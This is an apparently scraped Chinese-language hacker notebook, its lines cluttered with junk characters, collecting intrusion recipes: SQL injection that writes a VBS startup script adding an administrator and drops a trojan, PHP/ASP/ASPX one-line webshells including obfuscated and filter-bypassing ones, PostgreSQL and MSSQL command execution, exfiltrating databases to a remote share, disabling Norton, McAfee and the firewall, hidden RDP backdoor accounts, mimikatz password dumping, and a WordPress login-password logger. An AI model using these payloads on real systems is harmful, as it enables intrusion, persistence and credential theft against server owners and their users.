6 _) @8 @. l$ [# Puse test;0 j9 A. K1 |3 \% i3 _ ^! S
create table a (cmd text);
0 p8 B, P) C' _& @3 e$ \; e3 |insert into a values ("set wshshell=createobject (""wscript.shell"") " );# X. X: E S3 Z
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 ?+ u. ^9 _; V; x
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 Y* m4 y9 z; f( j s0 N8 Z7 _
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";: @3 C1 y, r! p- Q |3 T
drop table a;! f" d& P% z2 Q
- k7 r: {0 v, y" S% V1 V/ F英文版本:2 x7 \; _. W( s+ U
9 U/ [/ m9 H, r! I1 S4 y: }use test;
- k; @3 W9 f. i( Screate table a (cmd text);
# W$ _& p, e- s( |2 n( kinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
! F+ ~1 z5 ^6 w2 \% Jinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& C- B' @ b. e) b2 }0 S% D4 _insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );4 P5 o4 E4 W' i: Q
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
2 R1 Y! ^, D$ rdrop table a;& @6 T' C/ T5 o+ ?: k
, C7 O1 i, y6 D8 {& \create table a (cmd BLOB);
$ U; a) J" i, minsert into a values (CONVERT(木马的16进制代码,CHAR));& A' q5 E( w- r
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
: P o7 N% F$ h7 \& R! m* R* wdrop table a;
9 e. e) u. d- t, o D3 ~: i' _; U3 |+ w# ]! x* q% W: s
记录一下怎么处理变态诺顿
7 t4 K/ q& E: Z& Y% W查看诺顿服务的路径; n% @3 ` |5 y- F, Q2 M% w2 f' o
sc qc ccSetMgr
1 v7 k4 D3 x% w" q) b然后设置权限拒绝访问。做绝一点。。. x/ a5 w* {9 K9 [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system8 n% x) u5 x. v; a3 [' S0 w' w# l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
$ d9 D# m/ o; U+ n; T% \: {3 B% \; zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators' d! T8 k# p# h5 Y3 ~: ]
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
" D2 F+ ^- \$ Y4 k. u! F. \, R* |6 p5 w0 D* F5 ]) S6 A( J* }
然后再重启服务器2 W$ `4 A$ G2 d- ?! x5 z4 r+ F
iisreset /reboot9 ]3 Z3 P- l6 A
这样就搞定了。。不过完事后。记得恢复权限。。。。4 m) g9 W- R' i8 y0 i3 U
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
" q, D9 C9 S" qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
; @" @% }/ w& f7 f [9 [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
, `: q* S2 C2 \% l2 _7 A& fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
# t* T/ S$ ~3 l) y) r5 t. k9 dSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin2 I$ X8 j+ x: ~) P+ N S: c' h
; O" Q0 R: Q. G# Y* {" O
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
: v% b1 A6 O8 |4 Z% p, E" R J+ Y
% l4 q4 E4 h+ p5 ], H& npostgresql注射的一些东西
/ h S( j6 X7 I+ @( Q6 d如何获得webshell" h1 m u- d- E' b! B9 C
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
' }8 z- j H2 h2 U ihttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
' i' n* I! v, a/ Uhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
0 i; [* F# c7 j& ^# {( D2 ~, L如何读文件0 S& Q. u/ g6 z
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);* U7 \7 }( e& y% L' l, ]
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
& Q# |& x0 N+ ^- ~http://127.0.0.1/postgresql.php?id=1;select * from myfile;7 z) d) K9 A' k9 f, a
) |: s! j9 l6 ^1 sz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
+ n7 v* B3 i. a: {当然,这些的postgresql的数据库版本必须大于8.X0 P! k. K* a4 J7 |1 J
创建一个system的函数:# y, ^+ A1 C) ?: d1 u4 z ~
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT0 E' W: o% Q; u2 k
- f+ e& F4 W+ X( _
创建一个输出表:
0 J% e" Q. B1 { i/ ]6 {) a/ @CREATE TABLE stdout(id serial, system_out text): g( C- w3 ]8 F8 z; C) b' V
! w! S& s% z3 s; c3 n$ E
执行shell,输出到输出表内:* R, n; @( ?5 _) d$ X
SELECT system('uname -a > /tmp/test')
' H6 T: J- `" v
8 J( ], v8 T9 R0 ~0 x# R# qcopy 输出的内容到表里面;% k4 C+ q J9 G m) ]+ u% c
COPY stdout(system_out) FROM '/tmp/test'3 M7 R2 \- r- U4 P" {1 \
, b. J4 _8 Q7 n) H
从输出表内读取执行后的回显,判断是否执行成功
& i1 I: x/ w* ]9 P( j% }) ]) n+ z( l. r: ]: ^+ a- ^: D
SELECT system_out FROM stdout
( J$ H; c; @ A4 |% i3 H* R下面是测试例子7 v4 L- B% M; L( e6 w& W! g; F. m6 t
. }) n+ ^; M$ \' F/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 7 s: ]- X7 }( ]" C" b/ @2 X+ y
7 Y) M: u/ m0 U/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
9 o2 i7 j) V" B9 r9 dSTRICT --
1 P7 H9 m6 W# B0 f+ S/ o R) f3 r7 P- l: Z" B) C
/store.php?id=1; SELECT system('uname -a > /tmp/test') --% s( A) L" l5 J6 o: y
2 [9 n1 b n( f' M. j* e/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
$ R3 C4 r% R8 P! V3 s- ^) H
; E9 M9 P: e( a3 `' B% u/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
! M% X3 ~/ v% ]% k+ i1 u+ o" P* C4 j* Cnet stop sharedaccess stop the default firewall
7 M+ l! X6 N/ w- lnetsh firewall show show/config default firewall2 m$ ?# P& H- I' k0 x
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall, V( q/ Z' b5 o0 Q- F
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
8 v% A1 S# ]8 Q: L4 |& R修改3389端口方法(修改后不易被扫出)
6 T: a, b- g. f* i* } \, `修改服务器端的端口设置,注册表有2个地方需要修改, r9 _. }8 l0 p. p+ }2 X; `
6 H9 ]0 d) e5 n- F/ g1 I
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp] p2 m% n* o9 Z- J/ E1 }
PortNumber值,默认是3389,修改成所希望的端口,比如6000
; g, D2 o; ^1 h. }! I3 H5 v7 N) X8 g7 u
第二个地方:
% }0 ?" D4 b9 x& m" q# E, e T[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] , S- E; D( O4 i y
PortNumber值,默认是3389,修改成所希望的端口,比如6000
/ d. R: y0 B( f$ {* A) P! z0 S
& a3 p3 K4 A! G: a7 ?+ ^$ P+ U现在这样就可以了。重启系统就可以了
7 X1 ^, w" m! S6 a9 P i9 S- O y
- m+ u: [7 \1 F% Y2 l( @6 h查看3389远程登录的脚本
k4 A v& P* G6 M2 X2 i1 J# M2 G保存为一个bat文件
( s. a: b# n( T$ `* sdate /t >>D:\sec\TSlog\ts.log
0 m$ q& V$ C; `$ O% Otime /t >>D:\sec\TSlog\ts.log7 Z6 `6 w1 G. G$ z3 u
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
2 [. c, i/ L- s4 Z( wstart Explorer
% \9 [* `, k' v. \1 {% _6 d- n* d# Z7 y9 ?% Z
mstsc的参数:3 p8 T3 |7 h1 ]: |9 y0 Q
8 r# U0 A. J' b( u$ l远程桌面连接! \ x/ G/ U' M5 u
; e# u( X2 y& d* J1 ]MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]+ o. a k+ a# r1 O
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
& r" x' r; I2 E* p1 g; g" }& T: k: [8 `- S- J2 n! h
<Connection File> -- 指定连接的 .rdp 文件的名称。
' Y- I9 ~6 F4 N0 m2 J) m
3 S8 A+ D2 _3 {3 b) N7 u6 {/v:<server[:port]> -- 指定要连接到的终端服务器。9 z* t* b. h1 h) M/ R
4 X$ { x! ~: i" Z7 A
/console -- 连接到服务器的控制台会话。
( {1 u, U' H" H W( K" g. f
# Z+ M, u* m/ l9 N* e, g/f -- 以全屏模式启动客户端。; j! c! S: U, j
8 \7 h( a1 A* B% O5 e# O
/w:<width> -- 指定远程桌面屏幕的宽度。
2 ]2 Z' n3 O* ^& G+ I
% k$ e0 H/ `& i1 V: j0 H/h:<height> -- 指定远程桌面屏幕的高度。
9 G4 K4 W- B! @* B) S2 |3 d: ]8 [- S& G# {, x d6 _- s
/edit -- 打开指定的 .rdp 文件来编辑。
5 }& y2 e2 h& h" g( h: ]
$ V! V' R6 {$ |3 M/migrate -- 将客户端连接管理器创建的旧版3 w" N' |, H2 U, F
连接文件迁移到新的 .rdp 连接文件。
- R% H' h( \6 ?) f1 C# g6 O; ^; g0 u
0 D, L8 X/ f6 a% z) G其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
" w i) u" u+ g; q# E- V7 o$ Nmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
( A9 T! M7 {/ r& V" t9 F' y' t( w$ o
命令行下开启3389
" f3 g' X3 R* Vnet user asp.net aspnet /add7 Z6 C/ F9 S/ }' U
net localgroup Administrators asp.net /add
: ?0 A6 N. z+ o" r6 Znet localgroup "Remote Desktop Users" asp.net /add
_/ w4 H; T) W f Kattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D. J) p! V+ A7 \; z. }5 A
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 06 K2 }- _+ G: ~( f9 W5 m- o7 o
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
9 P) |% Z0 G8 Q* x5 l( _echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
5 s8 D# o1 J$ _( W/ asc config rasman start= auto8 d% @5 _# E% s; l
sc config remoteaccess start= auto
8 _3 K- z4 y7 w L* _net start rasman/ F9 V ~* G- o4 n
net start remoteaccess
. q0 R) B7 w2 bMedia
4 B3 m1 |* O" `& `! @" W<form id="frmUpload" enctype="multipart/form-data"" U: ~" H3 m" h" K G( D* q: e
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
2 L7 D1 t4 }- `" `<input type="file" name="NewFile" size="50"><br>. \& M+ R1 G' r: ` G0 m% ~
<input id="btnUpload" type="submit" value="Upload">" u& n/ ^' g( D8 s
</form>6 T2 R% k0 i ^
+ c* t/ z7 K, s$ X2 Q
control userpasswords2 查看用户的密码" m/ {- g; I( ]% o9 _% x" k4 L
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
6 j( L. F1 v( q) U, i: VSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a2 p# c3 o7 x8 J6 S$ r# G
- Z! ?2 s4 f. M0 v+ N! Q6 _( \
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
x' B" r' r' u( n; T测试1:5 a& K# ~' m* B% l5 m/ e7 c
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) Y9 F2 k- Z% @$ O3 g
# R" E. R9 l0 h* W' F测试2:
7 r* D0 n$ I. t7 l* d9 T# h7 v3 F" T
create table dirs(paths varchar(100),paths1 varchar(100), id int)5 B+ @/ |+ `+ ]
% N, n8 {2 G3 S2 F0 T: \delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--3 ~& S3 Y- U1 r
- J6 U5 J( V1 f& Z* _
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1$ t- e8 {* j; R7 K" W
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
7 {. V" Z; G2 Q8 ?& O! t可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;5 Y' y: |, L3 M5 w! `, e
net stop mcafeeframework {/ ~: U2 h; n7 W. `7 t
net stop mcshield/ i+ ~0 \+ X" o! y' }% u
net stop mcafeeengineservice
% \' y6 `2 t: i0 v$ Pnet stop mctaskmanager& x* e3 _2 v& A7 g" `
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D- `9 P) i/ T3 H. @
: B2 b* A4 S5 A. w$ W
VNCDump.zip (4.76 KB, 下载次数: 1)
& U& P: s" G1 s3 p+ H: r! @- s3 N! P密码在线破解http://tools88.com/safe/vnc.php4 y6 ]4 \& G" _' K6 l- x
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取* U% n8 D% _. d% s# I
" z# ~( b5 f. L8 s/ F- ?exec master..xp_cmdshell 'net user'3 d/ S/ h$ @. b, a) ^: i: Z
mssql执行命令。
; c6 _' S! g' c3 v6 m8 D# y获取mssql的密码hash查询5 R# f C& h. `6 j. L& V
select name,password from master.dbo.sysxlogins0 D$ c Q6 u6 i2 T5 g. L5 k6 X
) H% `; a, c) a9 v0 ubackup log dbName with NO_LOG;* X% u$ t% U* T8 \! N8 k+ P
backup log dbName with TRUNCATE_ONLY;
9 ` r1 c3 o8 S- l( `- t" L6 V [0 dDBCC SHRINKDATABASE(dbName);8 w' `% d' I! j0 Q; _- d4 o
mssql数据库压缩
$ e" m* @) T1 D/ r
1 q* }$ n2 W5 Z! ~5 `3 i8 eRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
. B7 ~7 ^8 @) Y- V+ Z8 b将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。3 g) G2 s0 Q! W* t
* z5 R( k# b4 Qbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'/ e. z# ? N3 j4 J& p- b
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak+ W- E" X2 r/ M, I) A4 d0 N
, i5 t$ A+ v6 G. y, d# }
Discuz!nt35渗透要点:
4 y, z' i' j' h6 _+ I(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
8 z" E3 b! s) |' I) i(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
Y2 B, B# x, W2 j3 J7 ](3)保存。: \) Q2 E/ G; T( n2 |
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
% o3 N! U6 k4 w. T) Rd:\rar.exe a -r d:\1.rar d:\website\
1 t% @0 Y4 {( P0 C" v$ k递归压缩website( {8 d3 T1 D9 o/ w! P% G" l
注意rar.exe的路径
+ M) K. q8 P' e, k% Z1 X" [+ ^: x) M6 p# c
<?php( X: _% B) E* |! B/ A. O2 @
0 K- w2 N3 B* c+ g) G$telok = "0${@eval($_POST[xxoo])}";
8 Y8 X3 q# B |( @# O! }9 e0 x
, L$ t* y/ Z$ x& ^0 r( w$username = "123456";
4 \7 @+ H. b* r1 d- \& z" V( W& ^; ?' v( e% F) G6 g6 m% O
$userpwd = "123456";" n+ {' c8 s, d1 W
8 k9 w8 s( J5 Z+ v8 g h$telhao = "123456";. j1 W9 z+ @& L p, G# o7 g$ u8 P$ D
# O$ p7 p# d1 L" W2 I; ]
$telinfo = "123456";
+ u- z* A5 u) e4 ~* ~0 H1 s1 d# @6 ?0 `2 V5 R. U5 \
?>
$ Z2 Z: E6 e/ `4 W" U8 Yphp一句话未过滤插入一句话木马
8 ?, ]/ v: p& p! S% |3 g9 S; J% B! ^
站库分离脱裤技巧" Q* p% R6 o. H, z1 o% q
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'# X+ ~6 i5 t' q( q, z/ M& c5 `9 y% @
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'0 Z7 N8 ^; r: P3 W0 Y! ~
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。/ _! s/ H' [/ {' j8 g
这儿利用的是马儿的专家模式(自己写代码)。% p3 W. i3 E% q
ini_set('display_errors', 1);3 E. C7 K& K4 h5 m
set_time_limit(0);* C7 h8 X! ~! a
error_reporting(E_ALL);2 S% i+ ^1 p" r* [9 V) X& \
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
' I8 y0 e; U. o$ Q& |9 T( Bmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());: ^# w2 @' N6 @& I( X1 x' M, Z
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());9 I' [+ A$ c) g8 x: P* }: O
$i = 0; ?0 X3 E" E& v& p! j4 l. }2 |
$tmp = '';
K% t) S$ ~ o y" ~1 ewhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {3 v* I* c* f6 p; S
$i = $i+1;
W: m8 [' z R: w* _ $tmp .= implode("::", $row)."\n";! F2 v* X- v# e
if(!($i%500)){//500条写入一个文件
: k2 l% G$ B) A $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
* q! W" j2 z+ O6 \ file_put_contents($filename,$tmp);1 |/ A# M7 d& z7 {+ i4 J8 e
$tmp = '';
( U4 h& E4 {* A0 x: n$ x1 J! n }* A3 h% ]$ s3 P) V4 C- |1 H
}! h; F) D1 I( U! o! n
mysql_free_result($result);1 @* k' Q3 s4 G4 v' e$ K1 V
* o. R' Q% k: T2 {5 L# Y$ Y4 t# I: ?) U& Z8 ^: v2 g( W; {1 ?
4 Q2 p" ^+ J* c9 G0 m9 {$ ~//down完后delete
/ u; s# j; z9 R( P+ k' W' e9 A) b9 L* y7 k; l2 |+ n, b
+ X) ~3 Z5 f7 X& oini_set('display_errors', 1);
9 q( L- A6 |- \; z; g& M& x: [error_reporting(E_ALL);3 X2 k4 s, F. K4 E
$i = 0;" x$ X& c% [5 C5 A0 u' T$ o$ ~
while($i<32) {
, f3 x, k" T& U% |8 t4 N7 Z' J $i = $i+1;
( Y* m! [3 E- r5 }7 {( ^ $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
! C$ z2 p+ N: p7 ~: r& ~# m* M unlink($filename);
2 I! c- e* E( l$ p$ T* ?! }. S7 e8 e}
1 p8 g1 N% H3 }% Ihttprint 收集操作系统指纹4 g$ y9 y; A) u0 D2 ^% K h. `
扫描192.168.1.100的所有端口
# b* Z: F! j9 F7 c+ m1 I+ x! Enmap –PN –sT –sV –p0-65535 192.168.1.100
$ A+ @ q- c8 u8 j& Qhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
7 S% D- F2 [" J: X/ E- D% Ehost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
3 }- Z7 \. I; k0 {: c; bNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host# l, m, {" r4 v* s6 h5 h: d/ d
% Y* v% X; A4 }% [3 q0 ~3 J
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
, ^) e) @3 b$ a+ }7 C! s3 ?( s% C) {, h" j
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)7 `& h' x4 J$ y2 t" O1 ?% l
" U& Q! E9 c! l( ?( q# A. h Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x8 P: d* p( I! V# n5 n7 G* f
( I$ L# u3 m! Z' u) z8 W2 k
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
" b" w5 \+ P' u `% Z2 q8 S0 z, q3 A/ h4 J7 ?* q: f
http://net-square.com/msnpawn/index.shtml (要求安装)% A% l& ~9 O2 P
) @, M% |# u. A/ R) j
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)# N" t+ q( ], i0 p R! m: G4 P
$ w0 M2 C; L1 p0 P# ^! G
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找); m9 R j' v) Z' u0 ?
set names gb2312) I! ^; F; P- ?5 U2 j, F
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。% ~4 U- U2 G0 M6 a: K% M3 C. ]
, \1 J2 h1 c6 a4 W# `
mysql 密码修改! w: s2 v4 ^0 }" p0 h# N5 h
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” % Z" C% M4 y9 Q' v/ \9 A
update user set password=PASSWORD('antian365.com') where user='root';
6 ]1 ^7 O* c% Y8 ^1 v8 iflush privileges;
( G7 ~! y0 Z" w7 c& u高级的PHP一句话木马后门1 `8 f6 F9 \* b% l. _! m9 Q2 G
' h, F! V: z# p2 u: x入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀" [* w( Z1 p$ _- `% H
. ]( }, ^% m! S; P3 d
1、
, w/ X7 M2 [+ t0 o* v* j+ G% W* D; |5 I9 `' U
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";; w0 V" {; Y. [! o+ l, y. h' W% I
; U1 N4 u/ l' K5 ?2 ?7 K: [, A& A
$hh("/[discuz]/e",$_POST['h'],"Access");2 C0 |5 u. D2 u) ` p3 g
$ T1 m5 Z; \) \) G9 a
//菜刀一句话( w) Z2 E" n0 F# ~% h
3 @: G5 S& Q" I5 W- F3 P) P
2、
$ X! G2 X- j* N" d% Q9 K( Y' e, ?1 D
$filename=$_GET['xbid'];
7 }( x/ ]6 m w& N. k1 u# H
- w' u) g; i! d. s5 @, S$ d9 Kinclude ($filename);
( g) Y$ j$ f& E7 }( ^! K7 c; G
6 _: Y" _4 K i8 \7 |( E2 s//危险的include函数,直接编译任何文件为php格式运行
( H, y4 B: w7 u m! m
6 ]* w, ^# Q' v1 u( c3、
$ q$ c, M" R! R# [# G0 L, u
( r7 R- [) n" \4 ?$ o* G) Q$reg="c"."o"."p"."y";
: f4 T9 x/ ~5 W- `( ? @1 R) {
9 U7 ^8 |$ M8 u) V6 L4 F7 y$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);* y) J1 ^* i4 g! h2 W: x+ c" X) {
k2 {# X! ?2 U- {
//重命名任何文件. U% F( e z- c- U7 l* O
+ o: E$ O3 T* ~# A4、
" o) _6 T" ~/ N# p2 @* U% X; H
0 t( i0 n0 x P# n& r9 p$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";( u# Z. J. f( w; y X5 }7 o5 ?
8 ^$ O. e' y$ ?$ y' \$gzid("/[discuz]/e",$_POST['h'],"Access");" J. A- z& I8 Q0 s6 O" F
! b# s% m9 `6 O# O, x8 K
//菜刀一句话
% I: W. r2 ?( ]" i# B. H% P( w1 c9 {( M$ J) D
5、include ($uid);
6 C3 M& K D$ ~4 W1 x. L
4 b% |: K; x: n" `, \8 }//危险的include函数,直接编译任何文件为php格式运行,POST
& n% L1 n: z/ U) x& V5 y5 e9 q0 [# {* l) ?
6 Z) g8 n+ C5 A( u) v4 p; n0 m5 W
//gif插一句话( f' h& C8 S* I; b
- w# @0 ]" q9 f1 u6、典型一句话% Y1 c: @7 ~# q$ |( C# H* r& b7 h
! b! W. m3 S1 _, [; Y1 a* q
程序后门代码, n2 D( k) T2 w8 w6 v$ i+ N
<?php eval_r($_POST[sb])?>
1 V* V% }1 e( J3 I6 n$ \7 f) c程序代码+ B+ w6 S5 F6 D J7 Q! B3 ]
<?php @eval_r($_POST[sb])?>; A/ D5 j: S' e" _9 s6 S
//容错代码
4 }- ? D- W2 U6 x8 t1 Y- N9 A5 Z! e程序代码
, `3 n# V2 }) o) L<?php assert($_POST[sb]);?>$ S! E3 ?3 A2 ]& ~$ m4 i( U" Y4 w
//使用lanker一句话客户端的专家模式执行相关的php语句" x- [: R! X# O$ a. l
程序代码
& W6 |" ~/ l; g4 u, t<?$_POST['sa']($_POST['sb']);?>
7 B2 |- \: v8 a2 E6 {& w, n% @6 W程序代码$ F7 t8 t' G: _' a" Y A+ I) H
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
1 s" p8 T0 n2 @% h& h程序代码
6 L; n+ ]( I+ I' C2 A<?php' K: U( Y; U/ w
@preg_replace("/[email]/e",$_POST['h'],"error");
8 m; Y! p# k6 C; H+ c. L?>
2 {+ R6 l/ T& G* w u# {7 b; y' h5 q//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
1 U: \$ W6 `) F' n( _程序代码6 R+ t- j+ a) `3 w2 ?% L# `
<O>h=@eval_r($_POST[c]);</O>/ m' k+ P& P* n2 P% H
程序代码
5 [# N) t4 J& `, m' L$ ~6 z3 J<script language="php">@eval_r($_POST[sb])</script> c2 |% h, ?0 X; z
//绕过<?限制的一句话& A, h% X: n7 V" S/ z1 N
: y; q: g* \: N
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
% u) i0 k8 E1 m5 q- l+ _$ `, ^详细用法:1 I* Z. G" R# Z! Y7 f
1、到tools目录。psexec \\127.0.0.1 cmd! \$ Y5 a+ v& s9 q4 S
2、执行mimikatz
' `" |7 v# q4 |8 o+ k3、执行 privilege::debug, p2 E6 P' p3 ^. J$ E
4、执行 inject::process lsass.exe sekurlsa.dll
" b# ^! o* G# [$ b5 W& a0 Y/ y5、执行@getLogonPasswords
% i5 n2 j8 ] T4 ~) m" V# Z! [" ]6、widget就是密码
& q, X. n% l+ w2 o; b7、exit退出,不要直接关闭否则系统会崩溃。7 Q- M: J; w- I" [# f: C
2 N2 t6 I! r$ E8 U, yhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
- g5 E' g6 ~( r+ o0 P0 r$ [" x1 P N# G4 A5 j9 K) m0 S
自动查找系统高危补丁
9 e5 }/ E, J$ h/ x3 G5 [9 Wsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt) ~; @. C) {0 m& a& A
% k4 P; m" V+ @; t9 W) `. s0 [突破安全狗的一句话aspx后门
* l: ~7 W. x, N2 s( ]) j<%@ Page Language="C#" ValidateRequest="false" %>4 G R: h$ @' [! e2 Q4 w
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>6 a% z* Y7 D5 S7 g, s& L
webshell下记录WordPress登陆密码
3 j7 S- u% y9 f7 T0 Xwebshell下记录Wordpress登陆密码方便进一步社工* k! N: j4 S/ O% B2 u# k) H1 C' G
在文件wp-login.php中539行处添加:
) P0 D5 v* F. h& Y* E9 W2 n1 D% A// log password
. [! K: g0 _6 E$log_user=$_POST['log'];7 l5 @3 k& R7 ~/ L
$log_pwd=$_POST['pwd'];' ?2 X9 d( M% M" v; e4 M3 c4 ?: I
$log_ip=$_SERVER["REMOTE_ADDR"];
$ K s, p. Y. V4 S; N$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
# b: n) ^$ \2 z) z; P5 o$txt=$txt.”\r\n”;% z5 f8 L ?& ]7 B# i4 d
if($log_user&&$log_pwd&&$log_ip){/ k" z I- [- I4 C
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);( ?1 ?3 J) B: M5 f0 g8 u; X- p' C' g
}; e4 L$ R: \! w1 z6 {; a- u
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。* c) x7 v7 t' P9 b- @- r/ s/ F
就是搜索case ‘login’/ F- v- X: K F1 t
在它下面直接插入即可,记录的密码生成在pwd.txt中,
